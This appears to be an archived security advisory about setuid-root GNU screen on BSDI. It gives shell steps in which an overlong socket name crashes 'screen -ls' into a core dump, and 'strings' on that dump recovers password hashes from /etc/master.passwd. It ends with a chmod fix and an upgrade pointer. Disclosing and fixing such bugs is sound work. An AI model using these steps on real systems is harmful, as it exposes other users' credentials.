COMMAND

    /usr/contrib/bin/screen

SYSTEMS AFFECTED

    BSDI

PROBLEM

    Khelbin  Sunvold  <khelbin@CONNIX.COM>  posted  following.  The
    program under  question is  /usr/contrib/bin/screen (BSDI).   This
    is screen version 3.05.02 and  is installed setuid root, as  it is
    "supposed" to be.  Here is a demonstration:

        $ screen

        Screen version 3.05.02 (FAU) 19-Aug-93

        Copyright (c) 1993 Juergen Weigert, Michael Schroeder
        Copyright (c) 1987 Oliver Laumann

        [snip boring messages]

        [Press Space or Return to end.]

        $ screen

        $ cd /tmp/screens/S-khelbin
        $ ls
        246.ttyp7.comet
        $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        $ screen -ls
        /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
        %1     278 Abort - core dumped  screen -ls
        $ ls -l
        total 176
        srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        -rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
        $ strings core.screen|less

    The core.screen  file contains  unencrypted password  strings from
    /etc/master.passwd, which  of course,  should not  be readable  by
    you.

    Brett Miller  found the  same bug  in version  3.07.01 running  on
    BSDI  2.1  and  have  successfully  tested  it  by running screen,
    suspending with ^Z ...killing the process with a sig 11.  When  an
    attempt is made to re-enter  the process with fg, the  core dumps.
    Running strings on the  core file will yield  unshadowed passwords
    which can be reconstructed.

SOLUTION

    chmod -s /usr/contrib/bin/screen while using old version.
    There were  several buffer  overflows in  old versions  of screen,
    the latest version is 3.7.2 available from

        ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz.

    The overflows  have been  fixed for  a long  time now,  and I  was
    unable to reproduce  the core dump  on linux with  screen 3.07.01.
    Anyway, with BSDI seems to work.